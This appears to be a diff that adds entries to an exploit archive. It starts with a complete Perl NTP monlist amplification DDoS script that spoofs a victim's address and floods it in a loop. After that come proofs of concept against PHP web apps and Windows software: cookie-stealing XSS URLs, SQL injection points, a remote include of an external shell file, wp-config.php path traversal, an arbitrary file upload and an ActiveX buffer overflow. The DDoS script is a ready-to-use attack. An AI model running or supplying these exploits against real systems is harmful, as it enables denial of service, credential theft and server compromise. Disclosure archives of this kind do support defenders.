send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ssdp)) or die $!;
|
||||
}
|
||||
}
|
||||
|
||||
|
195
platforms/multiple/dos/37562.pl
Executable file
195
platforms/multiple/dos/37562.pl
Executable file
|
@ -0,0 +1,195 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# ntp MON_GETLIST query amplification ddos
|
||||
#
|
||||
# Copyright 2015 (c) Todor Donev
|
||||
# todor.donev@gmail.com
|
||||
# http://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# A Network Time Protocol (NTP) Amplification
|
||||
# attack is an emerging form of Distributed
|
||||
# Denial of Service (DDoS) that relies on the
|
||||
# use of publically accessible NTP servers to
|
||||
# overwhelm a victim system with UDP traffic.
|
||||
# The NTP service supports a monitoring service
|
||||
# that allows administrators to query the server
|
||||
# for traffic counts of connected clients. This
|
||||
# information is provided via the “monlist”
|
||||
# command. The basic attack technique consists
|
||||
# of an attacker sending a "get monlist" request
|
||||
# to a vulnerable NTP server, with the source
|
||||
# address spoofed to be the victim’s address.
|
||||
#
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous program is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use at your own risk and educational
|
||||
# purpose ONLY!
|
||||
#
|
||||
# See also, UDP-based Amplification Attacks:
|
||||
# https://www.us-cert.gov/ncas/alerts/TA14-017A
|
||||
#
|
||||
#
|
||||
|
||||
use Socket;
|
||||
|
||||
if ( $< != 0 ) {
|
||||
print "Sorry, must be run as root!\n";
|
||||
print "This script use RAW Socket.\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
|
||||
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
|
||||
|
||||
print "[ ntpd MON_GETLIST query amplification ]\n";
|
||||
if (!defined $ntpd || !defined $victim) {
|
||||
print "[ Usg: $0 <ntp server> <victim>\n";
|
||||
print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
|
||||
exit;
|
||||
}
|
||||
print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";
|
||||
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
|
||||
setsockopt(RAW, 0, 1, 1) or die $!;
|
||||
main();
|
||||
|
||||
# Main program
|
||||
sub main {
|
||||
my $packet;
|
||||
|
||||
$packet = iphdr();
|
||||
$packet .= udphdr();
|
||||
$packet .= ntphdr();
|
||||
# b000000m...
|
||||
send_packet($packet);
|
||||
}
|
||||
|
||||
# IP header (Layer 3)
|
||||
sub iphdr {
|
||||
my $ip_ver = 4; # IP Version 4 (4 bits)
|
||||
my $iphdr_len = 5; # IP Header Length (4 bits)
|
||||
my $ip_tos = 0; # Differentiated Services (8 bits)
|
||||
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
|
||||
my $ip_frag_id = 0; # Identification Field (16 bits)
|
||||
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
|
||||
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
|
||||
my $ip_ttl = 255; # IP TTL (8 bits)
|
||||
my $ip_proto = 17; # IP Protocol (8 bits)
|
||||
my $ip_checksum = 0; # IP Checksum (16 bits)
|
||||
|
||||
# IP Packet
|
||||
my $iphdr = pack(
|
||||
'H2 H2 n n B16 h2 c n a4 a4',
|
||||
$ip_ver . $iphdr_len, $ip_tos,
|
||||
$ip_total_len, $ip_frag_id,
|
||||
$ip_frag_flag . $ip_frag_offset,
|
||||
$ip_ttl, $ip_proto, $ip_checksum,
|
||||
$victim, $ntpd
|
||||
);
|
||||
return $iphdr;
|
||||
}
|
||||
|
||||
# UDP Header (Layer 4)
|
||||
sub udphdr {
|
||||
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
|
||||
my $udp_dst_port = 123; # UDP Dest Port (16 btis) (0-65535)
|
||||
my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)
|
||||
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
|
||||
|
||||
# UDP Packet
|
||||
my $udphdr = pack(
|
||||
'n n n n',
|
||||
$udp_src_port,
|
||||
$udp_dst_port,
|
||||
$udp_len,
|
||||
$udp_checksum
|
||||
);
|
||||
return $udphdr;
|
||||
}
|
||||
|
||||
# NTP Header (Layer 7)
|
||||
sub ntphdr {
|
||||
my $rm_vn_mode = 0x27;
|
||||
|
||||
# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7
|
||||
#
|
||||
# A mode 7 packet is used exchanging data between an NTP server
|
||||
# and a client for purposes other than time synchronization, e.g.
|
||||
# monitoring, statistics gathering and configuration. A mode 7
|
||||
# packet has the following format:
|
||||
#
|
||||
# 0 1 2 3
|
||||
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
|
||||
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||||
# |R|M| VN | Mode|A| Sequence | Implementation| Req Code |
|
||||
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||||
# | Err | Number of data items | MBZ | Size of data item |
|
||||
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||||
# | |
|
||||
# | Data (Minimum 0 octets, maximum 500 octets) |
|
||||
# | |
|
||||
# | [...] |
|
||||
# | |
|
||||
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||||
# | Encryption Keyid (when A bit set) |
|
||||
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||||
# | |
|
||||
# | Message Authentication Code (when A bit set) |
|
||||
# | |
|
||||
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|
||||
#
|
||||
# where the fields are (note that the client sends requests, the server
|
||||
# responses):
|
||||
# Response Bit: This packet is a response (if clear, packet is a request).
|
||||
# More Bit: Set for all packets but the last in a response which
|
||||
# requires more than one packet.
|
||||
# Version Number: 2 for current version
|
||||
# Mode: Always 7
|
||||
my $auth = 0x00; # If set, this packet is authenticated.
|
||||
|
||||
my $implementation = 0x03; # Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)
|
||||
# The number of the implementation this request code
|
||||
# is defined by. An implementation number of zero is used
|
||||
# for requst codes/data formats which all implementations
|
||||
# agree on. Implementation number 255 is reserved (for
|
||||
# extensions, in case we run out).
|
||||
|
||||
my $request = 0x2a; # Request code is an implementation-specific code which specifies the
|
||||
# operation to be (which has been) performed and/or the
|
||||
# format and semantics of the data included in the packet
|
||||
# 0x02 (PEER_INFO), 0x03 (PEER_STATS), 0x04 (SYS_INFO),
|
||||
# 0x04 (SYS_STATS), 0x2a (MON_GETLIST)
|
||||
# NTP packet
|
||||
my $ntphdr = pack(
|
||||
'W2 C2 C2 C2',
|
||||
$rm_vn_mode,
|
||||
$auth,
|
||||
$implementation,
|
||||
$request
|
||||
);
|
||||
return $ntphdr;
|
||||
}
|
||||
|
||||
sub send_packet {
|
||||
while(1){
|
||||
select(undef, undef, undef, 0.30); # Sleep 300 milliseconds
|
||||
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $ntpd)) or die $!;
|
||||
}
|
||||
}
|
||||
|
||||
|
11
platforms/php/webapps/37537.txt
Executable file
11
platforms/php/webapps/37537.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/54660/info
|
||||
|
||||
phpProfiles is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to execute malicious code within the context of the web server process, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS]
|
||||
http://www.example.com/full_release/community.php?comm_id=[SQL]
|
||||
http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt?
|
11
platforms/php/webapps/37539.txt
Executable file
11
platforms/php/webapps/37539.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/54670/info
|
||||
|
||||
REDAXO is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
REDAXO 4.4 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/redaxo/index.php?page=user&subpage=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
|
||||
|
||||
http://www.example.com/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E
|
9
platforms/php/webapps/37540.txt
Executable file
9
platforms/php/webapps/37540.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54677/info
|
||||
|
||||
Odudeprofile Component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Odudeprofile 2.7 and 2.8 are vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL)
|
9
platforms/php/webapps/37541.txt
Executable file
9
platforms/php/webapps/37541.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54698/info
|
||||
|
||||
tekno.Portal is prone to an SQL-injection vulnerability.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
tekno.Portal 0.1b is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/teknoportal/anket.php?id=[SQLi]
|
9
platforms/php/webapps/37544.txt
Executable file
9
platforms/php/webapps/37544.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54715/info
|
||||
|
||||
ocPortal is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
A successful exploit may aid in phishing attacks; other attacks are possible.
|
||||
|
||||
Versions prior to ocPortal 7.1.6 are vulnerable.
|
||||
|
||||
http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com
|
38
platforms/php/webapps/37547.txt
Executable file
38
platforms/php/webapps/37547.txt
Executable file
|
@ -0,0 +1,38 @@
|
|||
source: http://www.securityfocus.com/bid/54725/info
|
||||
|
||||
Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#Request 1
|
||||
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
|
||||
Host: A.B.C.D
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-us,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Proxy-Connection: keep-alive
|
||||
|
||||
#Response 1
|
||||
<snip>
|
||||
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
|
||||
<snip>
|
||||
|
||||
#Request 2
|
||||
GET /d4d/exporters.php HTTP/1.1
|
||||
Host: A.B.C.D
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
|
||||
Connection: close
|
||||
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
|
||||
Content-Length: 2
|
||||
|
||||
#Response 2
|
||||
<snip>
|
||||
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
|
||||
<snip>
|
||||
|
||||
|
41
platforms/php/webapps/37548.txt
Executable file
41
platforms/php/webapps/37548.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
source: http://www.securityfocus.com/bid/54726/info
|
||||
|
||||
Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
||||
|
||||
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
#Request
|
||||
POST /d4d/uploader.php HTTP/1.0
|
||||
Host: A.B.C.D
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
|
||||
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
|
||||
Content-Length: 210
|
||||
|
||||
|
||||
--_Part_949_3365333252_3066945593
|
||||
Content-Disposition: form-data;
|
||||
name="uploadedfile"; filename="trustwave.txt"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
trustwave
|
||||
|
||||
--_Part_949_3365333252_3066945593--
|
||||
|
||||
#Response
|
||||
HTTP/1.1 200 OK
|
||||
Date: Wed, 25 Apr 2012 17:39:15 GMT
|
||||
Server: Apache
|
||||
X-Powered-By: PHP/5.3.3
|
||||
Vary: Accept-Encoding
|
||||
Content-Length: 41
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
{"success":1,"file_name":"trustwave.txt"}
|
||||
|
||||
#Confirming on File System
|
||||
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
|
||||
trustwave
|
||||
|
39
platforms/php/webapps/37551.txt
Executable file
39
platforms/php/webapps/37551.txt
Executable file
|
@ -0,0 +1,39 @@
|
|||
source: http://www.securityfocus.com/bid/54734/info
|
||||
|
||||
phpBB is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
phpBB 3.0.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
Request :
|
||||
|
||||
---
|
||||
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-us,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Proxy-Connection: keep-alive
|
||||
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
|
||||
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 258
|
||||
Connection: close
|
||||
|
||||
viewemail=1
|
||||
&massemail=1
|
||||
&allowpm=1
|
||||
&hideonline=0
|
||||
¬ifypm=1
|
||||
&popuppm=0
|
||||
&lang=en
|
||||
&style=%2b1111111111
|
||||
&tz=0
|
||||
&dst=0
|
||||
&dateoptions=D+M+d%2C+Y+g%3Ai+a
|
||||
&dateformat=D+M+d%2C+Y+g%3Ai+a
|
||||
&submit=Submit
|
||||
&creation_time=1343370877
|
||||
&form_token=576...
|
9
platforms/php/webapps/37552.txt
Executable file
9
platforms/php/webapps/37552.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54739/info
|
||||
|
||||
JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Note: The vulnerability related to 'logo.link' parameter has been moved to BID 55199 for better documentation.
|
||||
|
||||
http://www.example.com/player.swf?playerready=alert(document.cookie)
|
9
platforms/php/webapps/37553.txt
Executable file
9
platforms/php/webapps/37553.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54741/info
|
||||
|
||||
eNdonesia is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
eNdonesia 8.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/eNdonesia/mod.php?mod=diskusi&op=viewcat&cid=-[id][SQL INJECTION]
|
9
platforms/php/webapps/37554.txt
Executable file
9
platforms/php/webapps/37554.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/54753/info
|
||||
|
||||
Limny is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Limny 3.3.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/limny-3.3.1/index.php?q=-1' or 57 = '55 [SQL
|
13
platforms/php/webapps/37556.txt
Executable file
13
platforms/php/webapps/37556.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/54757/info
|
||||
|
||||
Distimo Monitor is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Distimo Monitor 6.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://www.example.com/downloads/date/metric:1/country:29/application:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/appstore:1
|
||||
https://www.example.com/downloads/date/metric:1/country:%22%3E%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C/application:99/appstore:1
|
||||
https://www.example.com/downloads/map/metric:%3E%22%3Ciframe%20src=http://www.example1.com%3E+%3E%22%3Ciframe%20src=http://www.example1.com%3E
|
||||
https://www.example.com/revenue/date/application:99/country:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com%3E
|
||||
https://www.example.com/revenue/date/application:%3E%22%3Ciframe%20src=http://www.example1.com%3E%3E%22%3Ciframe%20src=http://www.example1.com/country:30
|
62
platforms/php/webapps/37559.txt
Executable file
62
platforms/php/webapps/37559.txt
Executable file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
|
||||
# Date: 2015-07-10
|
||||
# Google Dork:
|
||||
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
|
||||
# Vendor Homepage: http://wordpress.dwbooster.com/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
|
||||
# Version: 1.0.5
|
||||
# Tested on: windows 7 + firefox.
|
||||
|
||||
====================
|
||||
DESCRIPTION
|
||||
====================
|
||||
|
||||
A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
|
||||
The vulnerability allows remote attackers to download arbitrary files from the server.
|
||||
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.
|
||||
|
||||
The web vulnerability can be exploited by remote attackers without privileged application user account
|
||||
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
|
||||
in application compromise.
|
||||
|
||||
==============
|
||||
POC
|
||||
==============
|
||||
|
||||
# http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
|
||||
|
||||
the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.
|
||||
|
||||
|
||||
==================
|
||||
VULNERABLE CODE
|
||||
==================
|
||||
|
||||
Located in cp-image-store.php
|
||||
|
||||
function cpis_download_file(){
|
||||
...
|
||||
|
||||
if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
|
||||
header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
|
||||
header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
|
||||
if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
|
||||
readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
|
||||
}else{
|
||||
@unlink( CPIS_DOWNLOAD.'/.htaccess');
|
||||
header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
|
||||
}
|
||||
...
|
||||
}
|
||||
|
||||
==================================
|
||||
|
||||
time-line
|
||||
|
||||
2015-07-01: vulnerability found
|
||||
2015-07-09: reported to vendor
|
||||
2015-07-10: released CP Image Store with Slideshow new version 1.0.6
|
||||
2015-07-10: full disclosure
|
||||
|
||||
===================================
|
||||
|
91
platforms/php/webapps/37560.txt
Executable file
91
platforms/php/webapps/37560.txt
Executable file
|
@ -0,0 +1,91 @@
|
|||
# Exploit Title: WordPress cp-multi-view-calendar.1.1.7 [Unauthenticated SQL injection vulnerabilities]
|
||||
# Date: 2015-07-10
|
||||
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
|
||||
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
|
||||
# Vendor Homepage: http://wordpress.dwbooster.com/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.7.zip
|
||||
# Version: 1.1.7
|
||||
# Tested on: windows 7 + sqlmap 0.9.
|
||||
# OWASP Top10: A1-Injection
|
||||
|
||||
|
||||
====================
|
||||
DESCRIPTION
|
||||
====================
|
||||
|
||||
Multiple SQL Injection vulnerabilities has been detected in the Wordpress cp-multi-view-calendar plugin in version 1.1.7 .
|
||||
The vulnerability allows remote attackers to inject own sql commands to compromise the affected web-application and connected dbms.
|
||||
|
||||
The SQL Injection vulnerabilities are located in the `edit.php` and `datafeed.php` files.
|
||||
Remote attackers are able to inject own sql commands to the vulnerable parameters value in these files GET/POST method request.
|
||||
|
||||
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account
|
||||
and without required user interaction. Successful exploitation of the sql injection vulnerability results in application and
|
||||
web-service or dbms compromise.
|
||||
|
||||
===================
|
||||
Severity Level
|
||||
===================
|
||||
Critical
|
||||
|
||||
|
||||
=================================
|
||||
AFFECTED URLs AND PARAMETER(S)
|
||||
=================================
|
||||
|
||||
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=[SQLi]
|
||||
|
||||
Vulnerable parameter: `id`
|
||||
|
||||
Explotation technique: blind (time-based) , union query based.
|
||||
|
||||
-------------------------------------------------------------------
|
||||
|
||||
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=[SQLi]
|
||||
|
||||
Vulnerable parameter: `calendarId`
|
||||
|
||||
Explotation technique: blind (boolean based, time based), error based.
|
||||
|
||||
-----------------------------------------------------------------------
|
||||
|
||||
http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=adddetails&id=1&calid=[SQLi]
|
||||
|
||||
Vulnerable parameter: `calid`
|
||||
|
||||
Explotation technique: blind (boolean based, time based)
|
||||
|
||||
-----------------------------------------------------------------------
|
||||
|
||||
|
||||
it isn't all sqli vulnerabilities, but these are the vulnerable functions:
|
||||
|
||||
|
||||
In file datafeed.php
|
||||
|
||||
-checkIfOverlapping(...)
|
||||
-updateDetailedCalendar(...)
|
||||
-removeCalendar(...)
|
||||
|
||||
|
||||
In file edit.php
|
||||
|
||||
-getCalendarByRange(...)
|
||||
|
||||
|
||||
... I think this is all..
|
||||
|
||||
|
||||
Sorry. I didn't have much time for this report.
|
||||
|
||||
==================================
|
||||
|
||||
time-line
|
||||
|
||||
2015-07-01: vulnerabilities found
|
||||
2015-07-09: reported to vendor
|
||||
2015-07-10:
|
||||
2015-07-12:
|
||||
|
||||
===================================
|
||||
|
39
platforms/windows/dos/37526.txt
Executable file
39
platforms/windows/dos/37526.txt
Executable file
|
@ -0,0 +1,39 @@
|
|||
# Title: Immunity Debugger - Crash
|
||||
# Date: 08/07/2015
|
||||
# Author: Arsyntex
|
||||
# Vendor Homepage: http://www.immunityinc.com/products/debugger/
|
||||
# Version: v1.85
|
||||
# Tested on: Windows 8.1 Pro
|
||||
|
||||
Incorrect path/file EXtEnsion parsing.
|
||||
|
||||
-Create folder with the name: .exe.exe and put any program inside and try debug it.
|
||||
-Try to debug an executable with the name: test.exe.exe or lib.exe.dll
|
||||
|
||||
The "OpenEXEfile" function does not check if the return value of strchr() is zero.
|
||||
----------------------------------------------------------------------------------
|
||||
loc_4B8182:
|
||||
|
||||
mov [esp+10h+var_10], edi
|
||||
add edi, 4
|
||||
mov [esp+10h+var_C], 20h
|
||||
mov [esp+10h+arg_24], eax
|
||||
call strchr ; return EAX=3D 0
|
||||
mov [esp+10h+var_10], eax
|
||||
mov [esp+10h+arg_28], eax ; (!)
|
||||
call strlen ; ntdll.strlen(s)
|
||||
|
||||
---------------------------------------------------------------------
|
||||
ntdll.strlen(s) - NULL parameter
|
||||
---------------------------------------------------------------------
|
||||
ntdll_strlen:
|
||||
|
||||
mov ecx, [esp+4] ; [esp+4] =3D 0 NULL pointer
|
||||
test ecx, 3 ; ...
|
||||
jz short loc_77C77510 ; jump
|
||||
...
|
||||
|
||||
loc_77C77510:
|
||||
|
||||
mov eax, [ecx] ; Access Violation
|
||||
---------------------------------------------------------------------
|
21
platforms/windows/dos/37558.txt
Executable file
21
platforms/windows/dos/37558.txt
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Title: Notepad++ - Crash
|
||||
# Date: 10/07/2015
|
||||
# Author: Rahul Pratap Singh (@0x62626262)
|
||||
# Vendor Homepage: https://notepad-plus-plus.org
|
||||
# Download: https://notepad-plus-plus.org/download/v6.7.3.html
|
||||
# Version: v6.7.3
|
||||
# Tested on: Windows_XP_x86 & Windows_7_x86
|
||||
|
||||
Incorrect theme file parsing, that leads to crash.
|
||||
|
||||
-Create a .xml file with numbereous "A" (around 1000) in it and save as
|
||||
test.xml
|
||||
-Go to this directory in windows "/appdata/roaming/notepad++/themes/" and
|
||||
paste above test.xml file in this theme folder and restart notepad++
|
||||
-Now start notepad++ and in menu tab, go in settings and then select style
|
||||
configurator and now select test file in theme select option
|
||||
-Now hit "save and close" button, it will crash with an error message
|
||||
|
||||
Thanks
|
||||
|
||||
Rahul Pratap Singh
|
24
platforms/windows/remote/37542.html
Executable file
24
platforms/windows/remote/37542.html
Executable file
|
@ -0,0 +1,24 @@
|
|||
source: http://www.securityfocus.com/bid/54701/info
|
||||
|
||||
BarCodeWiz ActiveX control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input.
|
||||
|
||||
An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
|
||||
|
||||
Successful exploits will allow attackers to execute arbitrary code within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
BarCodeWiz 4.0.0.0 is vulnerable to this issue; other versions may be affected as well.
|
||||
|
||||
<html>
|
||||
Exploit
|
||||
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc'
|
||||
/></object>
|
||||
<script language='vbscript'>
|
||||
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX
|
||||
Trial\DLL\BarcodeWiz.dll"
|
||||
prototype = "Property Let Barcode As String"
|
||||
memberName = "Barcode"
|
||||
progid = "BARCODEWIZLib.BarCodeWiz"
|
||||
argCount = 1
|
||||
arg1=String(14356, "A")
|
||||
poc.Barcode = arg1
|
||||
</script>
|
Loading…
Add table
Reference in a new issue